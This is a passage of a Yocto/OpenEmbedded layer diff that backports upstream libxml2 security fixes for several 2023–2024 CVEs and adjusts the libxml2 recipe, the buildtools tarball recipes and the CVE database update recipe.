+ xmlSchemaTreeItemPtr effectiveContent =
+ (xmlSchemaTreeItemPtr) type->subtypes;
+ /*
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
new file mode 100644
index 0000000000..1252668577
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch
@@ -0,0 +1,42 @@
+From 547edbf1cbdccd46b2e8ff322a456eaa5931c5df Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:49:27 +0200
+Subject: [PATCH] [CVE-2023-29469] Hashing of empty dict strings isn't
+ deterministic
+
+When hashing empty strings which aren't null-terminated,
+xmlDictComputeFastKey could produce inconsistent results. This could
+lead to various logic or memory errors, including double frees.
+
+For consistency the seed is also taken into account, but this shouldn't
+have an impact on security.
+
+Found by OSS-Fuzz.
+
+Fixes #510.
+
+CVE: CVE-2023-29469
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/547edbf1cbdccd46b2e8ff322a456eaa5931c5df]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ dict.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/dict.c b/dict.c
+index 86c3f6d7..d7fd1a06 100644
+--- a/dict.c
++++ b/dict.c
+@@ -451,7 +451,8 @@ static unsigned long
+ xmlDictComputeFastKey(const xmlChar *name, int namelen, int seed) {
+ unsigned long value = seed;
+
+- if (name == NULL) return(0);
++ if ((name == NULL) || (namelen <= 0))
++ return(value);
+ value = *name;
+ value <<= 5;
+ if (namelen > 10) {
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
new file mode 100644
index 0000000000..9689cec67d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch
@@ -0,0 +1,36 @@
+From d0c3f01e110d54415611c5fa0040cdf4a56053f9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 6 May 2023 17:47:37 +0200
+Subject: [PATCH] parser: Fix old SAX1 parser with custom callbacks
+
+For some reason, xmlCtxtUseOptionsInternal set the start and end element
+SAX handlers to the internal DOM builder functions when XML_PARSE_SAX1
+was specified. This means that custom SAX handlers could never work with
+that flag because these functions would receive the wrong user data
+argument and crash immediately.
+
+Fixes #535.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d0c3f01e110d54415611c5fa0040cdf4a56053f9]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index 6e09208..7814e6e 100644
+--- a/parser.c
++++ b/parser.c
+@@ -15156,8 +15156,6 @@ xmlCtxtUseOptionsInternal(xmlParserCtxtPtr ctxt, int options, const char *encodi
+ }
+ #ifdef LIBXML_SAX1_ENABLED
+ if (options & XML_PARSE_SAX1) {
+- ctxt->sax->startElement = xmlSAX2StartElement;
+- ctxt->sax->endElement = xmlSAX2EndElement;
+ ctxt->sax->startElementNs = NULL;
+ ctxt->sax->endElementNs = NULL;
+ ctxt->sax->initialized = 1;
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
new file mode 100644
index 0000000000..ebd9868fac
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch
@@ -0,0 +1,71 @@
+From 235b15a590eecf97b09e87bdb7e4f8333e9de129 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 8 May 2023 17:58:02 +0200
+Subject: [PATCH] SAX: Always initialize SAX1 element handlers
+
+Follow-up to commit d0c3f01e. A parser context will be initialized to
+SAX version 2, but this can be overridden with XML_PARSE_SAX1 later,
+so we must initialize the SAX1 element handlers as well.
+
+Change the check in xmlDetectSAX2 to only look for XML_SAX2_MAGIC, so
+we don't switch to SAX1 if the SAX2 element handlers are NULL.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/235b15a590eecf97b09e87bdb7e4f8333e9de129]
+CVE: CVE-2023-39615
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ SAX2.c | 11 +++++++----
+ parser.c | 5 +----
+ 2 files changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/SAX2.c b/SAX2.c
+index 5f141f9..902d34d 100644
+--- a/SAX2.c
++++ b/SAX2.c
+@@ -2869,20 +2869,23 @@ xmlSAXVersion(xmlSAXHandler *hdlr, int version)
+ {
+ if (hdlr == NULL) return(-1);
+ if (version == 2) {
+- hdlr->startElement = NULL;
+- hdlr->endElement = NULL;
+ hdlr->startElementNs = xmlSAX2StartElementNs;
+ hdlr->endElementNs = xmlSAX2EndElementNs;
+ hdlr->serror = NULL;
+ hdlr->initialized = XML_SAX2_MAGIC;
+ #ifdef LIBXML_SAX1_ENABLED
+ } else if (version == 1) {
+- hdlr->startElement = xmlSAX2StartElement;
+- hdlr->endElement = xmlSAX2EndElement;
+ hdlr->initialized = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+ } else
+ return(-1);
++#ifdef LIBXML_SAX1_ENABLED
++ hdlr->startElement = xmlSAX2StartElement;
++ hdlr->endElement = xmlSAX2EndElement;
++#else
++ hdlr->startElement = NULL;
++ hdlr->endElement = NULL;
++#endif /* LIBXML_SAX1_ENABLED */
+ hdlr->internalSubset = xmlSAX2InternalSubset;
+ hdlr->externalSubset = xmlSAX2ExternalSubset;
+ hdlr->isStandalone = xmlSAX2IsStandalone;
+diff --git a/parser.c b/parser.c
+index 7814e6e..cf0fb38 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1102,10 +1102,7 @@ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
+ if (ctxt == NULL) return;
+ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
+- ((sax->startElementNs != NULL) ||
+- (sax->endElementNs != NULL) ||
+- ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC))
+ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
new file mode 100644
index 0000000000..b177cdaba0
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch
@@ -0,0 +1,44 @@
+From 99fc048d7f7292c5ee18e44c400bd73bc63a47ed Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 14 Aug 2020 14:18:50 +0200
+Subject: [PATCH] Don't use SAX1 if all element handlers are NULL
+
+Running xmllint with "--sax --noout" installs a SAX2 handler with all
+callbacks set to NULL. In this case or similar situations, we don't want
+to switch to SAX1 parsing.
+
+Note: This patch is needed for "CVE-2023-39615-0002" patch to apply.
+Without this patch the build will fail with undefined sax error.
+
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/libxml2/-/commit/99fc048d7f7292c5ee18e44c400bd73bc63a47ed]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ parser.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/parser.c b/parser.c
+index bb677b0..6e09208 100644
+--- a/parser.c
++++ b/parser.c
+@@ -1098,11 +1098,15 @@ xmlHasFeature(xmlFeature feature)
+ */
+ static void
+ xmlDetectSAX2(xmlParserCtxtPtr ctxt) {
++ xmlSAXHandlerPtr sax;
+ if (ctxt == NULL) return;
++ sax = ctxt->sax;
+ #ifdef LIBXML_SAX1_ENABLED
+- if ((ctxt->sax) && (ctxt->sax->initialized == XML_SAX2_MAGIC) &&
+- ((ctxt->sax->startElementNs != NULL) ||
+- (ctxt->sax->endElementNs != NULL))) ctxt->sax2 = 1;
++ if ((sax) && (sax->initialized == XML_SAX2_MAGIC) &&
++ ((sax->startElementNs != NULL) ||
++ (sax->endElementNs != NULL) ||
++ ((sax->startElement == NULL) && (sax->endElement == NULL))))
++ ctxt->sax2 = 1;
+ #else
+ ctxt->sax2 = 1;
+ #endif /* LIBXML_SAX1_ENABLED */
+--
+2.24.4
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
new file mode 100644
index 0000000000..182bb29abd
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch
@@ -0,0 +1,50 @@
+From a22bd982bf10291deea8ba0c61bf75b898c604ce Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 2 Nov 2022 15:44:42 +0100
+Subject: [PATCH] malloc-fail: Fix memory leak in xmlStaticCopyNodeList
+
+Found with libFuzzer, see #344.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/a22bd982bf10291deea8ba0c61bf75b898c604ce]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 507869efe..647288ce3 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4461,7 +4461,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ if (doc->intSubset == NULL) {
+ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ q->doc = doc;
+ q->parent = parent;
+ doc->intSubset = (xmlDtdPtr) q;
+@@ -4473,7 +4473,7 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ } else
+ #endif /* LIBXML_TREE_ENABLED */
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) return(NULL);
++ if (q == NULL) goto error;
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4486,6 +4486,9 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ node = node->next;
+ }
+ return(ret);
++error:
++ xmlFreeNodeList(ret);
++ return(NULL);
+ }
+
+ /**
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
new file mode 100644
index 0000000000..c7e9681e6a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch
@@ -0,0 +1,80 @@
+From d39f78069dff496ec865c73aa44d7110e429bce9 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 23 Aug 2023 20:24:24 +0200
+Subject: [PATCH] tree: Fix copying of DTDs
+
+- Don't create multiple DTD nodes.
+- Fix UAF if malloc fails.
+- Skip DTD nodes if tree module is disabled.
+
+Fixes #583.
+
+CVE: CVE-2023-45322
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/d39f78069dff496ec865c73aa44d7110e429bce9]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tree.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 6c8a875b9..02c1b5791 100644
+--- a/tree.c
++++ b/tree.c
+@@ -4471,29 +4471,28 @@ xmlNodePtr
+ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ xmlNodePtr ret = NULL;
+ xmlNodePtr p = NULL,q;
++ xmlDtdPtr newSubset = NULL;
+
+ while (node != NULL) {
+-#ifdef LIBXML_TREE_ENABLED
+ if (node->type == XML_DTD_NODE ) {
+- if (doc == NULL) {
++#ifdef LIBXML_TREE_ENABLED
++ if ((doc == NULL) || (doc->intSubset != NULL)) {
+ node = node->next;
+ continue;
+ }
+- if (doc->intSubset == NULL) {
+- q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
+- if (q == NULL) goto error;
+- q->doc = doc;
+- q->parent = parent;
+- doc->intSubset = (xmlDtdPtr) q;
+- xmlAddChild(parent, q);
+- } else {
+- q = (xmlNodePtr) doc->intSubset;
+- xmlAddChild(parent, q);
+- }
+- } else
++ q = (xmlNodePtr) xmlCopyDtd( (xmlDtdPtr) node );
++ if (q == NULL) goto error;
++ q->doc = doc;
++ q->parent = parent;
++ newSubset = (xmlDtdPtr) q;
++#else
++ node = node->next;
++ continue;
+ #endif /* LIBXML_TREE_ENABLED */
++ } else {
+ q = xmlStaticCopyNode(node, doc, parent, 1);
+- if (q == NULL) goto error;
++ if (q == NULL) goto error;
++ }
+ if (ret == NULL) {
+ q->prev = NULL;
+ ret = p = q;
+@@ -4505,6 +4504,8 @@ xmlStaticCopyNodeList(xmlNodePtr node, xmlDocPtr doc, xmlNodePtr parent) {
+ }
+ node = node->next;
+ }
++ if (newSubset != NULL)
++ doc->intSubset = newSubset;
+ return(ret);
+ error:
+ xmlFreeNodeList(ret);
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
new file mode 100644
index 0000000000..31183399f8
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch
@@ -0,0 +1,38 @@
+From 31c6ce3b63f8a494ad9e31ca65187a73d8ad3508 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Mon, 9 Nov 2020 17:55:44 +0100
+Subject: [PATCH] Avoid call stack overflow with XML reader and recursive
+ XIncludes
+
+Don't process XIncludes in the result of another inclusion to avoid
+infinite recursion resulting in a call stack overflow.
+
+This is something the XInclude engine shouldn't allow but correct
+handling of intra-document includes would require major changes.
+
+Found by OSS-Fuzz.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/31c6ce3b63f8a494ad9e31ca65187a73d8ad3508]
+CVE: CVE-2024-25062 #Dependency Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 01adf74f4..72e40b032 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1585,7 +1585,8 @@ node_found:
+ /*
+ * Handle XInclude if asked for
+ */
+- if ((reader->xinclude) && (reader->node != NULL) &&
++ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+ ((xmlStrEqual(reader->node->ns->href, XINCLUDE_NS)) ||
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
new file mode 100644
index 0000000000..5365d5546a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch
@@ -0,0 +1,33 @@
+From 2b0aac140d739905c7848a42efc60bfe783a39b7 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 14 Oct 2023 22:45:54 +0200
+Subject: [PATCH] [CVE-2024-25062] xmlreader: Don't expand XIncludes when
+ backtracking
+
+Fixes a use-after-free if XML Reader if used with DTD validation and
+XInclude expansion.
+
+Fixes #604.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2b0aac140d739905c7848a42efc60bfe783a39b7]
+CVE: CVE-2024-25062
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 979385a13..fefd68e0b 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1443,6 +1443,7 @@ node_found:
+ * Handle XInclude if asked for
+ */
+ if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++ (reader->state != XML_TEXTREADER_BACKTRACK) &&
+ (reader->node != NULL) &&
+ (reader->node->type == XML_ELEMENT_NODE) &&
+ (reader->node->ns != NULL) &&
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
-Add 'install-ptest' rule. Print a standard result line for
-each test.
+From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
+From: Tony Tascioglu <tony.tascioglu@windriver.com>
+Date: Tue, 11 May 2021 11:57:46 -0400
+Subject: [PATCH] Add 'install-ptest' rule.
+
+Print a standard result line for each test.
Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
-Upstream-Status: Backport
+Upstream-Status: Pending
Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
---
- Makefile.am | 9 ++++
+ Makefile.am | 9 +++
runsuite.c | 1 +
runtest.c | 2 +
runxmlconf.c | 1 +
- testapi.c | 122 ++++++++++++++++++++++++++++++---------------
- testchar.c | 156 +++++++++++++++++++++++++++++++++++++++++-----------------
+ testapi.c | 122 ++++++++++++++++++++++++++-------------
+ testchar.c | 156 +++++++++++++++++++++++++++++++++++---------------
testdict.c | 1 +
testlimits.c | 1 +
testrecurse.c | 2 +
9 files changed, 210 insertions(+), 85 deletions(-)
diff --git a/Makefile.am b/Makefile.am
-index 9c630be..7cfd04b 100644
+index 05d1671f..ae622745 100644
--- a/Makefile.am
+++ b/Makefile.am
-@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS)
+@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
#testOOM_DEPENDENCIES = $(DEPS)
#testOOM_LDADD= $(LDADDS)
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
[ -d test ] || $(LN_S) $(srcdir)/test .
diff --git a/runsuite.c b/runsuite.c
-index aaab13e..9ba2c5d 100644
+index d24b5ec3..f7ff2521 100644
--- a/runsuite.c
+++ b/runsuite.c
-@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
if (logfile != NULL)
fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
}
#else /* !SCHEMAS */
diff --git a/runtest.c b/runtest.c
-index addda5c..8ba5d59 100644
+index ffa98d04..470f95cb 100644
--- a/runtest.c
+++ b/runtest.c
-@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) {
+@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
xmlCharEncCloseFunc(ebcdicHandler);
xmlCharEncCloseFunc(eucJpHandler);
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
return(err);
}
-@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
xmlCleanupParser();
xmlMemoryDump();
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
}
diff --git a/runxmlconf.c b/runxmlconf.c
-index cef20f4..4f291fb 100644
+index 70f61017..e882b3a1 100644
--- a/runxmlconf.c
+++ b/runxmlconf.c
@@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
}
diff --git a/testapi.c b/testapi.c
-index 4a751e2..7ccc066 100644
+index ff8b470d..52b51d78 100644
--- a/testapi.c
+++ b/testapi.c
@@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
}
diff --git a/testchar.c b/testchar.c
-index 0d08792..f555d3b 100644
+index 6866a175..7bce0132 100644
--- a/testchar.c
+++ b/testchar.c
@@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
/*
* Cleanup function for the XML library.
diff --git a/testdict.c b/testdict.c
-index 40bebd0..114b934 100644
+index 40bebd05..114b9347 100644
--- a/testdict.c
+++ b/testdict.c
@@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
return(ret);
}
diff --git a/testlimits.c b/testlimits.c
-index 68c94db..1584434 100644
+index 059116a6..f0bee68d 100644
--- a/testlimits.c
+++ b/testlimits.c
@@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
return(ret);
}
diff --git a/testrecurse.c b/testrecurse.c
-index f95ae1c..74c8f8b 100644
+index 0cbe25a6..3ecadb40 100644
--- a/testrecurse.c
+++ b/testrecurse.c
@@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
return(ret);
}
--
-2.7.4
+2.25.1
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
SUMMARY = "XML C Parser Library and Toolkit"
DESCRIPTION = "The XML Parser Library allows for manipulation of XML files. Libxml2 exports Push and Pull type parser interfaces for both XML and HTML. It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD. Libxml2 includes complete XPath, XPointer and Xinclude implementations. It also has a SAX like interface, which is designed to be compatible with Expat."
-HOMEPAGE = "http://www.xmlsoft.org/"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
SECTION = "libs"
LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
DEPENDS = "zlib virtual/libiconv"
-SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
- http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
+inherit gnomebase
+
+SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
file://libxml-64bit.patch \
file://runtest.patch \
file://run-ptest \
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
file://CVE-2020-7595.patch \
file://CVE-2019-20388.patch \
file://CVE-2020-24977.patch \
+ file://CVE-2021-3517.patch \
+ file://CVE-2021-3537.patch \
+ file://CVE-2021-3518.patch \
+ file://CVE-2021-3541.patch \
+ file://CVE-2022-23308.patch \
+ file://CVE-2022-23308-fix-regression.patch \
+ file://CVE-2022-29824-dependent.patch \
+ file://CVE-2022-29824.patch \
+ file://0001-Port-gentest.py-to-Python-3.patch \
+ file://CVE-2016-3709.patch \
+ file://CVE-2022-40303.patch \
+ file://CVE-2022-40304.patch \
+ file://CVE-2023-28484.patch \
+ file://CVE-2023-29469.patch \
+ file://CVE-2023-39615-pre.patch \
+ file://CVE-2023-39615-0001.patch \
+ file://CVE-2023-39615-0002.patch \
+ file://CVE-2021-3516.patch \
+ file://CVE-2023-45322-1.patch \
+ file://CVE-2023-45322-2.patch \
+ file://CVE-2024-25062-pre1.patch \
+ file://CVE-2024-25062.patch \
"
-SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5"
-SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
+SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
inherit autotools pkgconfig binconfig-disabled ptest features_check
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
-RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
+RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
@@ -81,6 +103,16 @@ do_configure_prepend () {
}
do_compile_ptest() {
+ # Make sure that testapi.c is newer than gentests.py, because
+ # with reproducible builds, they will both get e.g. Jan 1 1970
+ # modification time from SOURCE_DATE_EPOCH and then check-am
+ # might try to rebuild_testapi, which will fail even with
+ # 0001-Port-gentest.py-to-Python-3.patch, because it needs
+ # libxml2 module (libxml2-native dependency and correctly
+ # set PYTHON_SITE_PACKAGES), it's easier to
+ # just rely on pre-generated testapi.c from the release
+ touch ${S}/testapi.c
+
oe_runmake check-am
}
diff --git a/meta/recipes-core/meta/buildtools-extended-tarball.bb b/meta/recipes-core/meta/buildtools-extended-tarball.bb
index c32d0107c3..83e3fddccc 100644
--- a/meta/recipes-core/meta/buildtools-extended-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-extended-tarball.bb
@@ -28,8 +28,21 @@ TOOLCHAIN_HOST_TASK += "\
nativesdk-libtool \
nativesdk-pkgconfig \
nativesdk-glibc-utils \
+ nativesdk-glibc-gconv-ibm850 \
+ nativesdk-glibc-gconv-iso8859-1 \
+ nativesdk-glibc-gconv-utf-16 \
+ nativesdk-glibc-gconv-cp1250 \
+ nativesdk-glibc-gconv-cp1251 \
+ nativesdk-glibc-gconv-cp1252 \
+ nativesdk-glibc-gconv-euc-jp \
+ nativesdk-glibc-gconv-libjis \
nativesdk-libxcrypt-dev \
+ nativesdk-parted \
+ nativesdk-dosfstools \
+ nativesdk-gptfdisk \
"
+# gconv-cp1250, cp1251 and euc-jp needed for iconv to work in vim builds
+# also copied list from uninative
TOOLCHAIN_OUTPUTNAME = "${SDK_ARCH}-buildtools-extended-nativesdk-standalone-${DISTRO_VERSION}"
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index 434ffdc334..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
# Generate new (mini) sdk-environment-setup file
script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
touch $script
- echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:$PATH' >> $script
+ echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 0cd3a1c153..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
deltask do_install
deltask do_populate_sysroot
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# Timeout for blocking socket operations, such as the connection attempt.
